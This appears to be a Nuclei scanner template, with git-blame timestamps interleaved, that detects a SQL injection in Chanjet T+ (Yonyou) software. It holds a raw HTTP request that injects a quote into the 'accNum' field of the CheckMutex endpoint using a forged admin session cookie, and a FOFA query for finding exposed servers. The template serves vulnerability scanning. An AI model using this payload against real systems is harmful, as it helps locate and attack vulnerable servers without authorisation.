2023-08-18 03:22:06 +00:00
|
|
|
id: chanjet-tplus-checkmutex-sqli
|
|
|
|
|
|
|
|
|
|
info:
|
2023-09-15 12:23:57 +00:00
|
|
|
name: Chanjet Tplus CheckMutex - SQL Injection
|
2023-08-18 03:22:06 +00:00
|
|
|
author: unknown
|
2023-09-15 12:23:57 +00:00
|
|
|
severity: high
|
2023-08-18 03:22:06 +00:00
|
|
|
description: |
|
|
|
|
|
There is an SQL injection vulnerability in the Changjetcrm financial crm system under Yonyou.
|
|
|
|
|
reference:
|
2023-09-15 12:23:57 +00:00
|
|
|
- https://github.com/MrWQ/vulnerability-paper/blob/7551f7584bd35039028b1d9473a00201ed18e6b2/bugs/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91%E7%94%A8%E5%8F%8B%E7%95%85%E6%8D%B7%E9%80%9A%20T%2B%20SQL%20%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
|
|
|
|
|
metadata:
|
|
|
|
|
max-request: 1
|
|
|
|
|
verified: true
|
2023-09-18 12:37:42 +00:00
|
|
|
fofa-query: app="畅捷通-TPlus"
|
|
|
|
|
tags: chanjet,tplus,sqli
|
2023-08-18 03:22:06 +00:00
|
|
|
|
|
|
|
|
http:
|
|
|
|
|
- raw:
|
|
|
|
|
- |
|
|
|
|
|
POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1
|
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
Content-Type: text/plain
|
|
|
|
|
Cookie: ASP.NET_SessionId=; sid=admin
|
|
|
|
|
|
|
|
|
|
{"accNum": "6'", "functionTag": "SYS0104", "url": ""}
|
2023-09-15 12:23:57 +00:00
|
|
|
|
2023-09-18 12:37:42 +00:00
|
|
|
matchers-condition: and
|
2023-08-18 03:22:06 +00:00
|
|
|
matchers:
|
|
|
|
|
- type: word
|
2023-09-15 12:23:57 +00:00
|
|
|
part: body
|
2023-08-18 03:22:06 +00:00
|
|
|
words:
|
2023-09-18 12:37:42 +00:00
|
|
|
- 'order by begintime'
|
|
|
|
|
- '"value":'
|
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
|
part: header
|
|
|
|
|
words:
|
|
|
|
|
- "text/plain"
|
2023-09-15 12:23:57 +00:00
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
|
status:
|
|
|
|
|
- 200
|
